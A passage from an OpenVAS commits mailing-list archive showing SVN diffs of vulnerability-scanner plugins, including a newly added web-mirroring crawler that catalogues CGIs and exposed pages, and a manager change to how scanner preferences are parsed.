script_dependencies("find_service.nes", "http_version.nasl"); + script_require_ports("Services/www", 80); + script_exclude_keys("Settings/disable_cgi_scanning"); + exit(0); +} + + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); +if(!can_host_php(port:port))exit(0); + +dirs = make_list("/photopost","/photos","/gallery",cgi_dirs()); + +foreach dir (dirs) { + + url = string(dir, "/index.php"); + req = http_get(item:url, port:port); + buf = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE); + if( buf == NULL )continue; + + if(egrep(pattern: "]+>Photo Sharing Gallery by PhotoPost", string: buf, icase: TRUE) && + egrep(pattern: "Copyright.*All Enthusiast, Inc", string: buf, icase: TRUE) + ) + { + if(strlen(dir)>0) { + install=dir; + } else { + install=string("/"); + } + + vers = string("unknown"); + + set_kb_item(name: string("www/", port, "/photopost"), value: string(vers," under ",install)); + + info = string("None\n\nPhotoPost Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/photopost_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl =================================================================== --- trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/sambar_cgi_path_disclosure.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -68,7 +68,7 @@ req = http_get(port: port, item: strcat(dir, "/", fil)); r = http_keepalive_send_recv(port:port, data: req); p = strcat("SCRIPT_FILENAME:*", fil); - if (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[ \t]*[A-Z]\\\\') + if (r && (match(string: r, pattern: p) || r =~ 'DOCUMENT_ROOT:[\t]*[A-Z]\\\\')) { security_warning(port); exit(0); Modified: trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/secpod_surgemail_detect.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -87,8 +87,8 @@ exit(0); } -sndReq = http_get(item:"/", port:surge_port); -rcvRes = http_send_recv(port:surge_port, data:sndReq); +sndReq = http_get(item:"/", port:surgemail_port); +rcvRes = http_send_recv(port:surgemail_port, data:sndReq); if(egrep(pattern:"SurgeMail", string:rcvRes, icase:1)) { Added: trunk/openvas-plugins/scripts/webmirror.nasl =================================================================== --- trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/webmirror.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -0,0 +1,1200 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# WEBMIRROR 2.0 +# +# Saved from +# http://patch-tracker.debian.org/patch/misc/view/nessus-plugins/2.2.10-6/scripts/webmirror.nasl +# +# Authors: +# Renaud Deraison . +# +# includes some code by H D Moore +# +# Modified by Michael Meyer +# +# Copyright: +# Copyright (c) 2001 - 2003 Renaud Deraison +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(10662); + script_version("$Revision$"); + script_name("Web mirroring"); + + desc = " +This script makes a mirror of the remote web site(s) +and extracts the list of CGIs that are used by the remote +host. + +It is suggested you give a high timeout value to +this plugin and that you change the number of +pages to mirror in the 'Options' section of +the client. + +Risk factor : None"; + + script_description(desc); + script_summary("Performs a quick web mirror"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is Copyright (C) 2001 - 2003 Renaud Deraison"); + script_family("Web application abuses"); + script_dependencie("find_service.nes", "httpver.nasl", "DDI_Directory_Scanner.nasl"); + script_require_ports("Services/www", 80); + script_add_preference(name:"Number of pages to mirror : ", + type:"entry", + value:"200"); + script_add_preference(name:"Start page : ", + type:"entry", + value:"/"); + exit(0); +} + +include("http_func.inc"); +include("http_keepalive.inc"); +include("global_settings.inc"); + + +#-------------------------------------------------------------------------# +function my_http_recv(socket) +{ + local_var h, b, l; + + h = http_recv_headers2(socket:socket); + if(!h)return(NULL); + + if("Content-Type" >< h) + { + if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:h))return(h); + } + + b = http_recv_body(socket: socket, headers: h, length:0); + return (string(h, "\r\n", b)); +} + + + +function my_http_keepalive_recv() +{ + local_var headers, body, length, tmp, chunked, killme; + + killme = 0; + length = -1; + headers = http_recv_headers2(socket:__ka_socket); + if(strlen(headers) == 0)headers = http_recv_headers2(socket:__ka_socket); + + if(ereg(pattern:"^HEAD.*HTTP/.*", string:__ka_last_request)) + { + # HEAD does not return a body + return(headers); + } + + if("Content-Type" >< headers) + { + if(!egrep(pattern:"^Content-Type: text/(xml|html)", string:headers)) + { + http_close_socket(__ka_socket); + __ka_socket = 0; + return(headers); + } + } + + if("Content-Length" >< headers) + { + tmp = egrep(string:headers, pattern:"^Content-Length: [0-9]*"); + length = int(ereg_replace(string:tmp, pattern:"^Content-Length: ([0-9]*)", replace:"\1")); + } + + + + if((length < 0) && (egrep(pattern:"transfer-encoding: chunked", string:headers, icase:TRUE))) + { + while(1) + { + tmp = recv_line(socket:__ka_socket, length:4096); + length = hex2dec(xvalue:tmp); + if(length > 512*1024) + { + length = 512*1024; + killme = 1; + } + body = string(body, recv(socket:__ka_socket, length:length+2, min:length+2)); + if(strlen(body) > 512*1024)killme = 1; + + if(length == 0 || killme){ + http_keepalive_check_connection(headers:headers); + return(string(headers,"\r\n", body)); # This is expected - don't put this line before the previous + } + } + } + + + if(length >= 0) + { + if(length > 512*1024)length = 512*1024; + + body = recv(socket:__ka_socket, length:length, min:length); + } + else { + # If we don't have the length, we close the connection to make sure + # the next request won't mix up the replies. + + #display("ERROR - Keep Alive, but no length!!!\n", __ka_last_request); + body = recv(socket:__ka_socket, length:16384); + http_close_socket(__ka_socket); + __ka_socket = http_open_socket(__ka_port); + } + + + + http_keepalive_check_connection(headers:headers); + return(string(headers,"\r\n", body)); +} + + + +function my_http_keepalive_send_recv(port, data) +{ + local_var id, n; + + if(data == NULL) + return; + + if(__ka_enabled == -1)__ka_enabled = http_keepalive_enabled(port:port); + + + + if(__ka_enabled == 0) + { + local_var soc, r; + soc = http_open_socket(port); + if(!soc)return NULL; + send(socket:soc, data:data); + r = my_http_recv(socket:soc); + http_close_socket(soc); + return r; + } + + + if((port != __ka_port)||(!__ka_socket)) + { + if(__ka_socket)http_close_socket(__ka_socket); + __ka_port = port; + __ka_socket = http_open_socket(port); + if(!__ka_socket)return NULL; + } + + id = stridx(data, string("\r\n\r\n")); + data = str_replace(string:data, find:"Connection: Close", replace:"Connection: Keep-Alive", count:1); + __ka_last_request = data; + n = send(socket:__ka_socket, data:data); + if(n <= 0) + { + http_close_socket(__ka_socket); + __ka_socket = http_open_socket(__ka_port); + if(__ka_socket == 0)return NULL; + send(socket:__ka_socket, data:data); + } + + return(my_http_keepalive_recv()); +} + +#-------------------------------------------------------------------# + + +function add_cgi_dir(dir) +{ + local_var d, dirs, req, res; + + if ( num_cgi_dirs > max_cgi_dirs ) return 0; + + req = http_get(item:string(dir, "/non-existant-", rand()), port:port); + req = my_http_keepalive_send_recv(port:port, data:req); + if(ereg(pattern:"^HTTP/[0-9]\.[0-9] 404 ", string:req)) + { + dirs = cgi_dirs(); + foreach d (dirs) + { + if(d == dir)return(0); + } + + if(isnull(CGI_Dirs_List[dir])) + { + #display(CGI_Dirs_List[dir], "\n"); + set_kb_item(name:"/tmp/cgibin", value:dir); + CGI_Dirs_List[dir] = 1; + num_cgi_dirs ++; + } + } +} + + +#--------------------------------------------------------------------------# + +function add_30x(url) +{ + if(isnull(URLs_30x_hash[url])) + { + set_kb_item(name:string("www/", port, "/content/30x"), value:url); + URLs_30x_hash[url] = 1; + } +} + + +function add_auth(url) +{ + if(isnull(URLs_auth_hash[url])) + { + set_kb_item(name:string("www/", port, "/content/auth_required"), value:url); + URLs_auth_hash[url] = 1; + if(url == "/")RootPasswordProtected = 1; + } +} + +#--------------------------------------------------------------------------# + +num_url = 0; + +function add_url(url) +{ + local_var ext, dir; + + if ( num_url > 100 ) return 0; + + if(debug > 5)display("**** ADD URL ", url, "\n"); + if(isnull(URLs_hash[url])) + { + URLs = make_list(URLs, url); + URLs_hash[url] = 0; + + url = ereg_replace(string:url, + pattern:"(.*)\?.*", + replace:"\1"); + + + ext = ereg_replace(pattern:".*\.([^\.]*)$", string:url, replace:"\1"); + if(strlen(ext) && ext[0] != "/") + { + set_kb_item(name:string("www/", port, "/content/extensions/", ext), value:url); + } + + dir = dir(url:url); + if(dir && !Dirs[dir]) + { + Dirs[dir] = 1; + set_kb_item(name:string("www/", port, "/content/directories"), value:dir); + if(isnull(URLs_hash[dir])) + { + URLs = make_list(URLs, dir); + if(Apache)URLs = make_list(URLs, string(dir, "/?D=A")); + else if(iPlanet)URLs = make_list(URLs, string(dir, "/?PageServices")); + URLs_hash[dir] = 0; + } + } + } +} + +function cgi2hash(cgi) +{ + local_var cur_cgi, cur_arg, i, ret; + + ret = make_list(); + + for(i=0;i= strlen(cgi))return ret; + i += 2; + break; + } + else cur_arg += cgi[i]; + } + } + cur_cgi += cgi[i]; + } + return ret; +} + +function hash2cgi(hash) +{ + local_var ret, h; + + ret = ""; + foreach h (keys(hash)) + { + ret += string(h, " [", hash[h], "] "); + } + return ret; +} + + +function add_cgi(cgi, args) +{ + local_var mydir, tmp, a, new_args, common, c; + + args = string(args); + + if(isnull(CGIs[cgi])) + { + CGIs[cgi] = args; + mydir = dir(url:cgi); + if(!CGIsDirs[mydir]) + { + CGIsDirs[mydir] = 1; + add_cgi_dir(dir:mydir); + } + } + else { + tmp = cgi2hash(cgi:CGIs[cgi]); + new_args = cgi2hash(cgi:args); + common = make_list(); + foreach c (keys(tmp)) + { + common[c] = tmp[c]; + } + + foreach c (keys(new_args)) + { + if(isnull(common[c]))common[c] = new_args[c]; + } + CGIs[cgi] = hash2cgi(hash:common); + } +} + + + +#---------------------------------------------------------------------------# + +function dir(url) +{ + return ereg_replace(pattern:"(.*)/[^/]*", string:url, replace:"\1"); +} + +function remove_cgi_arguments(url) +{ + local_var idx, cgi, cgi_args, args, arg, a, b; + + # Remove the trailing blanks + while(url[strlen(url) - 1] == " ") + { + url = substr(url, 0, strlen(url) - 2); + } + + idx = stridx(url, "?"); + if(idx < 0) + return url; + else if(idx >= strlen(url) - 1) + { + cgi = substr(url, 0, strlen(url) - 2); + add_cgi(cgi:cgi, args:""); + return cgi; + } + else + { + if(idx > 1)cgi = substr(url, 0, idx - 1); + else cgi = "."; + cgi_args = split(substr(url, idx + 1, strlen(url) - 1), sep:"&"); + foreach arg (make_list(cgi_args)) + { + arg = arg - "&"; + arg = arg - "amp;"; + a = ereg_replace(string:arg, pattern:"(.*)=.*", replace:"\1"); + b = ereg_replace(string:arg, pattern:".*=(.*)", replace:"\1"); + if(a != b) + args = string(args, a , " [", b, "] "); + else + args = string(args, arg, " [] "); + } + add_cgi(cgi:cgi, args:args); + return cgi; + } +} + + +function basename(name, level) +{ + local_var i; + + if(strlen(name) == 0) + return NULL; + + + for(i = strlen(name) - 1; i >= 0 ; i --) + { + if(name[i] == "/") + { + level --; + if(level < 0) + { + return(substr(name, 0, i)); + } + } + } + + # Level is too high, we return / + return "/"; +} + + + +function canonical_url(url, current) +{ + local_var num_dots, i, location ; + +#debug = int(5); + + if(debug > 1)display("***** canonical '", url, "' (current:", current, ")\n"); + + if(strlen(url) == 0) + return NULL; + + if(url[0] == "#") + return NULL; + + + if(url == "./" || url == ".") + return current; + + + if(debug > 2)display("**** canonical(again) ", url, "\n"); + + if(ereg(pattern:"[a-z]*:", string:url, icase:TRUE)) + { + if(ereg(pattern:"^http://", string:url, icase:TRUE)) + { + location = ereg_replace(string:url, pattern:"http://([^/]*)/.*", replace:"\1", icase:TRUE); + if(location != url) + { + if(location != get_host_name())return NULL; + else return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"http://[^/]*/([^?]*)", replace:"/\1", icase:TRUE)); + } + } + } + else + { + if(url == "//") return "/"; + + if(ereg(pattern:"^//.*", string:url, icase:TRUE)) + { + location = ereg_replace(string:url, pattern:"//([^/]*)/.*", replace:"\1", icase:TRUE); + if(location != url) + { + if(location == get_host_name())return remove_cgi_arguments(url:ereg_replace(string:url, pattern:"//[^/]*/([^?]*)", replace:"/\1", icase:TRUE)); + } + return NULL; + } + + if(url[0] == "/") + return remove_cgi_arguments(url:url); + else + { + i = 0; + num_dots = 0; + + while(i < strlen(url) - 2 && url[i] == "." && url[i+1] == "." && url[i+2] == "/") + { + num_dots ++; + url = url - "../"; + if(strlen(url) == 0)break; + } + + while(i < strlen(url) && url[i] == "." && url[i+1] == "/") + { + url = url - "./"; + if(strlen(url) == 0)break; + } + url = string(basename(name:current, level:num_dots), url); + } + + i = stridx(url, "#"); + if(i >= 0)url = substr(url, 0, i - 1); + + + if(url[0] != "/") + return remove_cgi_arguments(string("/", url)); + else + return remove_cgi_arguments(url:url); + } + return NULL; +} + + + +#--------------------------------------------------------------------# + + +function my_http_get(item, port) +{ + local_var ret, accept, idx; + + ret = http_get(item:page, port:port); + accept = egrep(string:ret, pattern:"^Accept:.*"); + ret = ret - accept; + idx = stridx(ret, string("\r\n\r\n")); + + + ret = insstr(ret, string("\r\nAccept: text/html, text/xml\r\n\r\n"), idx); + return ret; +} + + +function extract_location(data) +{ + local_var loc, url; + + + + loc = egrep(string:data, pattern:"^Location: "); + if(!loc) return NULL; + + loc = loc - string("\r\n"); + loc = ereg_replace(string:loc, + pattern:"Location: (.*)$", + replace:"\1"); + + + + url = canonical_url(url:loc, current:"/"); + if( url ) + { + add_url(url : url); + return url; + } + + return NULL; +} + + + +function retr( port, page ) +{ + local_var req, resp, q; + + if( debug )display("*** RETR ", page, "\n"); + + req = my_http_get(item:page, port:port); + resp = my_http_keepalive_send_recv(port:port, data:req); + if( resp == NULL ) exit(0); # No web server + + if(!match(pattern:"HTTP* 200 *", string:resp)) + { + if(match(pattern:"HTTP* 401 *", string:resp) || + match(pattern:"HTTP* 403 *", string:resp)) + { + add_auth(url:page); + return NULL; + } + if(match(pattern:"HTTP* 301 *", string:resp) || + match(pattern:"HTTP* 302 *", string:resp)) + { + q = egrep(pattern:"^Location:.*", string:resp); + add_30x(url:page); + + # Don't echo back what we added ourselves... + if(!(("?PageServices" >< page || "?D=A" >< page) && ("?PageServices" >< q || "?D=A" >< q))) + extract_location(data:resp); + return NULL; + } + } + + if(egrep(pattern:"^Server:.*Apache.*", string:resp))Apache ++; + else if(egrep(pattern:"^Server:.*Netscape.*", string:resp))iPlanet ++; + + if(!egrep(pattern:"^Content-Type: text/(xml|html).*", string:resp)) + return NULL; + else + { + resp = strstr(resp, string("\r\n\r\n")); + if(!resp)return NULL; # Broken web server ? + resp = str_replace(string:resp, find:string("\r\n"), replace:" "); + resp = str_replace(string:resp, find:string("\n"), replace:" "); + resp = str_replace(string:resp, find:string("\t"), replace:" "); + return resp; + } +} + +#---------------------------------------------------------------------------# + + +function token_split(content) +{ + local_var i, j, k, str; + local_var ret, len, num; + + num = 0; + + ret = make_list(); + len = strlen(content); + + for (i=0;i", i); + if( j < 0)return(ret); + i = j; + } + else + if(content[i]=="<") + { + str = ""; + i ++; + + while(content[i] == " ")i ++; + + for(j = i; j < len ; j++) + { + if(content[j] == '"') + { + k = stridx(content, '"', j + 1); + if(k < 0){ + return(ret); # bad page + } + str = str + substr(content, j, k); + j = k; + } + else if(content[j] == '>') + { + if(ereg(pattern:"^(a|area|frame|meta|iframe|link|img|form|/form|input|button|textarea|select|applet)( .*|$)", string:str, icase:TRUE)) + { + num ++; + ret = make_list(ret, str); + if ( num > 50 ) return ret; # Too many items + } + break; + } + else str = str + content[j]; + } + i = j; + } + } + + return(ret); +} + + + +function token_parse(token) +{ + local_var ret, i, j, len, current_word, word_index, current_value, char; + + + ret = make_list(); + len = strlen(token); + current_word = ""; + word_index = 0; + + for( i = 0 ; i < len ; i ++) + { + if((token[i] == " ")||(token[i] == "=")) + { + while(i+1 < len && token[i+1] == " ")i ++; + if(i >= len)break; + + if(word_index == 0) + { + ret["nasl_token_type"] = tolower(current_word); + } + else + { + while(i+1 < len && token[i] == " ")i ++; + if(token[i] != "=") + { + ret[tolower(current_word)] = NULL; + } + else + { + i++; + char = NULL; + if(i >= len)break; + if(token[i] == '"')char = '"'; + else if(token[i] == "'")char = "'"; + + if(!isnull(char)) + { + j = stridx(token, char, i + 1); + if(j < 0) + { + if(debug)display("PARSE ERROR 1\n"); + return(ret); # Parse error + } + ret[tolower(current_word)] = substr(token, i + 1, j - 1); + while(j+1 < len && token[j+1]==" ")j++; + i = j; + } + else + { + j = stridx(token, ' ', i + 1); + if(j < 0) + { + j = strlen(token); + } + ret[tolower(current_word)] = substr(token, i, j - 1); + i = j; + } + } + } + current_word = ""; + word_index ++; + } + else { + if(i < len)current_word = current_word + token[i]; + } + } + + if(!word_index)ret["nasl_token_type"] = tolower(current_word); + return ret; +} + + +#-------------------------------------------------------------------------# + +function parse_java(elements) +{ + archive = elements["archive"]; + code = elements["code"]; + codebase = elements["codebase"]; + + if (codebase) + { + if (archive) + set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",archive)); + if (code) + set_kb_item(name:string("www/", port, "/java_classfile"), value:string(codebase,"/",code)); + } + else + { + if (archive) + set_kb_item(name:string("www/", port, "/java_classfile"), value:archive); + if (code) + set_kb_item(name:string("www/", port, "/java_classfile"), value:code); + } +} + + + + + + + +function parse_javascript(elements, current) +{ + local_var url, pat; + + if(debug > 15)display("*** JAVASCRIPT\n"); + + pat = string(".*window\\.open\\('([^',", raw_string(0x29), "]*)'.*\\)*"); + url = ereg_replace(pattern:pat, + string:elements["onclick"], + replace:"\1", + icase:TRUE); + + + if( url == elements["onclick"]) + return NULL; + + url = canonical_url(url:url, current:current); + if( url ) + { + add_url(url : url); + return url; + } + + return NULL; +} + + +function parse_dir_from_src(elements, current) +{ + local_var src, dir; + + src = elements["src"]; + if( ! src ) return NULL; + + src = canonical_url(url:src, current:current); + dir = dir(url:src); + if(dir && !Dirs[dir]) + { + Dirs[dir] = 1; + set_kb_item(name:string("www/", port, "/content/directories"), value:dir); + if(isnull(URLs_hash[dir])) + { + URLs = make_list(URLs, dir); + URLs_hash[dir] = 0; + } + } +} + + +function parse_href_or_src(elements, current) +{ + local_var href; + + href = elements["href"]; + if(!href)href = elements["src"]; + + if(!href){ + return NULL; + } + + href = canonical_url(url:href, current:current); + if( href ) + { + add_url(url: href); + return href; + } +} + + +function parse_refresh(elements, current) +{ + local_var href, content, t, sub; + + content = elements["content"]; + + if(!content) + return NULL; + t = strstr(content, ";"); + if( t != NULL ) content = substr(t, 1, strlen(t) - 1); + + content = string("a ", content); + sub = token_parse(token:content); + + if(isnull(sub)) return NULL; + + href = sub["url"]; + if(!href) + return NULL; + + href = canonical_url(url:href, current:current); + if ( href ) + { + add_url(url: href); + return href; + } +} + + +function parse_form(elements, current) +{ + local_var action; + + action = elements["action"]; + + action = canonical_url(url:action, current:current); + if ( action ) + return action; + else + return NULL; +} + + +function pre_parse(data, src_page) +{ + local_var php_path, fp_save, data2; + + if ("Index of /" >< data) + { + if(!Misc[src_page]) + { + if("?D=A" >!< src_page && "?PageServices" >!< src_page) + { + misc_report = misc_report + string("Directory index found at ", src_page, "\n"); + Misc[src_page] = 1; + } + } + } + + if ("phpinfo()" >< data) + { + if(!Misc[src_page]) + { + misc_report = misc_report + string("Extraneous phpinfo() script found at ", src_page, "\n"); + Misc[src_page] = 1; + } + + } + + if("Fatal" >< data || "Warning" >< data) + { + data2 = strstr(data, "Fatal"); + if(!data2)data2 = strstr(data, "Warning"); + + data2 = strstr(data2, "in "); + + php_path = ereg_replace(pattern:"in ([^<]*).*", string:data2, replace:"\1"); + if (php_path != data2) + { + if (!Misc[src_page]) + { + misc_report = misc_report + string("PHP script discloses physical path at ", src_page, " (", php_path, ")\n"); + Misc[src_page] = 1; + } + } + } + + + data2 = strstr(data, "unescape"); + + if(data2 && ereg(pattern:"unescape..(%([0-9]|[A-Z])*){200,}.*", string:data2)) + { + if(!Misc[src_page]) + { + misc_report += string(src_page, " seems to have been 'encrypted' with HTML Guardian\n"); + guardian ++; + } + } + + if("CREATED WITH THE APPLET PASSWORD WIZARD WWW.COFFEECUP.COM" >< data) + { + if(!Misc[src_page]) + { + misc_report += string(src_page, " seems to contain links 'protected' by CoffeCup\n"); + coffeecup++; + } + + + } + + if("SaveResults" >< data) + { + fp_save = ereg_replace(pattern:string("(.*SaveResults.*U-File=)", quote, "(.*)", quote, ".*"), string:data, replace:"\2"); + if (fp_save != data) + { + if (!Misc[src_page]) + { + misc_report = misc_report + string("FrontPage form stores results in web root at ", src_page, " (", fp_save, ")\n"); + Misc[src_page] = 1; + } + } + } +} + + + +function parse_main(current, data) +{ + local_var tokens, elements, cgi, form_cgis, form_cgis_level, args, store_cgi; + + form_cgis = make_list(); + form_cgis_level = 0; + argz = NULL; + store_cgi = 0; + tokens = token_split(content: data); + foreach token (tokens) + { + elements = token_parse(token:token); + if(!isnull(elements)) + { + + if(elements["onclick"]) + parse_javascript(elements:elements, current:current); + + if ( elements["nasl_token_type"] == "applet") + parse_java(elements:elements); + + if(elements["nasl_token_type"] == "a" || + elements["nasl_token_type"] == "link" || + elements["nasl_token_type"] == "frame" || + elements["nasl_token_type"] == "iframe" || + elements["nasl_token_type"] == "area") + if( parse_href_or_src(elements:elements, current:current) == NULL) { + if(debug > 20)display("ERROR - ", token, "\n"); + } + if(elements["nasl_token_type"] == "img") + parse_dir_from_src(elements:elements, current:current); + + if(elements["nasl_token_type"] == "meta") + parse_refresh(elements:elements, current:current); + + if( elements["nasl_token_type"] == "form" ) + { + cgi = parse_form(elements:elements, current:current); + if( cgi ) + { + form_cgis[form_cgis_level] = cgi; + store_cgi = 1; + } + form_cgis_level ++; + } + + if( elements["nasl_token_type"] == "/form") + { + form_cgis_level --; + if( store_cgi != 0) add_cgi(cgi:form_cgis[form_cgis_level], args:argz); + argz = ""; + store_cgi = 0; + } + + if( elements["nasl_token_type"] == "input" || + elements["nasl_token_type"] == "select") + { + if(elements["name"]) + argz += string( elements["name"], " [", elements["value"], "] "); + } + } + } +} + + +#----------------------------------------------------------------------# +# MAIN() # +#----------------------------------------------------------------------# + + + +start_page = script_get_preference("Start page : "); +if(isnull(start_page) || start_page == "")start_page = "/"; + + +max_pages = int(script_get_preference( "Number of pages to mirror : " )); +if(max_pages <= 0)max_pages = 30; + +dirs = get_kb_list(string("www/", port, "/content/directories")); + + +num_cgi_dirs = 0; +if ( thorough_tests ) max_cgi_dirs = 1024; +else max_cgi_dirs = 16; + + + +debug = 0; + +port = get_http_port(default:80); + +if(!get_port_state(port))exit(0); + +URLs = make_list(start_page); +if(dirs) URLs = make_list(start_page, dirs); +URLs_hash[start_page] = 0; + + +Apache = 0; +iPlanet = 0; + +CGIs = make_list(); +Misc = make_list(); +Dirs = make_list(); + +CGI_Dirs_List = make_list(); + +URLs_30x_hash = make_list(); +URLs_auth_hash = make_list(); + + +Code404 = make_list(); + +misc_report = ""; +cnt = 0; + +RootPasswordProtected = 0; + +guardian = 0; +coffeecup = 0; + +foreach URL (URLs) +{ + if(!URLs_hash[URL]) + { + page = retr(port:port, page:URL); + cnt ++; + pre_parse(src_page:URL, data:page); + parse_main(data:page, current:URL); + URLs_hash[URL] = 1; + if(cnt >= max_pages)break; + } +} + + +if(cnt == 1) +{ + if(RootPasswordProtected) + { + set_kb_item(name:string("www/", port, "/password_protected"), value:TRUE); + } +} +foreach URL (URLs) +{ + display(URL,"\n"); +} + +display("-----------------------------------------\n"); + + +report = ""; + +foreach foo (keys(CGIs)) +{ + args = CGIs[foo]; + if(!args) args = ""; + set_kb_item(name:string("www/", port, "/cgis"), value:string(foo, " - ", args)); + + + if(!report) + report = string("The following CGI have been discovered :\n\nSyntax : cginame (arguments [default value])\n\n", foo, " (", args, ")\n"); + else + report = string(report, foo, " (", args, ")\n"); +} + +if(misc_report) +{ + + report = string(report, "\n\n", misc_report); +} + + +if(guardian) +{ + report += string(" + +HTML Guardian is a tool which claims to encrypt web pages, whereas it simply +does a transposition of the content of the page. It is is no way a safe +way to make sure your HTML pages are protected. + +See also : http://www.securityfocus.com/archive/1/315950 +BID : 7169"); +} + + +if(coffeecup) +{ + report += " + +CoffeeCup Wizard is a tool which claims to encrypt links to web pages, +to force users to authenticate before they access the links. However, +the 'encryption' used is a simple transposition method which can be +decoded without the need of knowing a real username and password. + +BID : 6995 7023"; +} + +if(strlen(report)) +{ + security_note(port:port, data:report); +} + Property changes on: trunk/openvas-plugins/scripts/webmirror.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl =================================================================== --- trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl 2009-10-02 11:10:27 UTC (rev 5357) +++ trunk/openvas-plugins/scripts/ypupdated_remote_exec.nasl 2009-10-02 17:48:14 UTC (rev 5358) @@ -50,7 +50,7 @@ exit(0); } -include("sunrpc_func.inc"); +include("misc_func.inc"); g_timeout = 15; # Must be greater than the maximum sleep value RPC_PROG = 100028; @@ -116,7 +116,7 @@ tcp_ports = get_kb_list('Services/RPC/ypupdated'); if (isnull(tcp_ports)) { - port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_TCP); + port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_TCP); if (port) tcp_ports = make_list(port); } @@ -126,7 +126,7 @@ udp_ports = get_kb_list('Services/udp/RPC/ypupdated'); if (isnull(udp_ports)) { - port = get_rpc_port2(program: RPC_PROG, protocol: IPPROTO_UDP); + port = get_rpc_port(program: RPC_PROG, protocol: IPPROTO_UDP); if (port) udp_ports = make_list(port); } From scm-commit at wald.intevation.org Sat Oct 3 12:15:29 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 3 Oct 2009 12:15:29 +0200 (CEST) Subject: [Openvas-commits] r5359 - in trunk/openvas-manager: . src src/tests Message-ID: <20091003101529.1316D85C72E5@pyrosoma.intevation.org> Author: mattm Date: 2009-10-03 12:15:27 +0200 (Sat, 03 Oct 2009) New Revision: 5359 Added: trunk/openvas-manager/src/tests/omp_get_preferences_2.c Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/otp.c trunk/openvas-manager/src/tests/CMakeLists.txt Log: When parsing the OTP PREFERENCES, read in all the preferences before enabling them, otherwise OMP GET_PREFERENCES might return a partial set of preferences. * src/otp.c (current_scanner_preferences): New variable. (make_scanner_preferences): Return preferences instead of setting scanner. (add_scanner_preference): Set preference on a given preference table instead of on scanner.preferences. Update caller. (process_otp_scanner_input): Initialise current_scanner_preferences with the make_scanner_preferences return. In SCANNER_PREFERENCE_NAME set scanner.preferences to current_scanner_preferences. * src/tests/omp_get_preferences_2.c: New file. Tests that first two successful returns from GET_PREFERENCES are identical. * src/tests/CMakeLists.txt: Add omp_get_preferences_2. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/ChangeLog 2009-10-03 10:15:27 UTC (rev 5359) @@ -1,3 +1,22 @@ +2009-09-30 Matthew Mundell + + When parsing the OTP PREFERENCES, read in all the preferences before + enabling them, otherwise OMP GET_PREFERENCES might return a partial + set of preferences. + + * src/otp.c (current_scanner_preferences): New variable. + (make_scanner_preferences): Return preferences instead of setting scanner. + (add_scanner_preference): Set preference on a given preference table + instead of on scanner.preferences. Update caller. + (process_otp_scanner_input): Initialise current_scanner_preferences + with the make_scanner_preferences return. In SCANNER_PREFERENCE_NAME set + scanner.preferences to current_scanner_preferences. + + * src/tests/omp_get_preferences_2.c: New file. Tests that first two + successful returns from GET_PREFERENCES are identical. + + * src/tests/CMakeLists.txt: Add omp_get_preferences_2. + 2009-09-30 Jan-Oliver Wagner Post-release version bump. Modified: trunk/openvas-manager/src/otp.c =================================================================== --- trunk/openvas-manager/src/otp.c 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/otp.c 2009-10-03 10:15:27 UTC (rev 5359) @@ -35,6 +35,13 @@ * task records according to the OTP messages in the string. */ +/** + * @todo + * Ensure that the globals used to store information across the XML + * parser callbacks (for example, current_scanner_preferences) are freed in + * the failure cases. + */ + #include "otp.h" #include "manage.h" #include "tracef.h" @@ -411,16 +418,20 @@ static char* current_scanner_preference = NULL; /** + * @brief The current scanner preferences, during reading of scanner preferences. + */ +static GHashTable* current_scanner_preferences = NULL; + +/** * @brief Create the scanner preferences. */ -static void +static GHashTable* make_scanner_preferences () { - if (scanner.preferences) g_hash_table_destroy (scanner.preferences); - scanner.preferences = g_hash_table_new_full (g_str_hash, - g_str_equal, - g_free, - g_free); + return g_hash_table_new_full (g_str_hash, + g_str_equal, + g_free, + g_free); } /** @@ -433,9 +444,11 @@ * @param[in] value The value of the 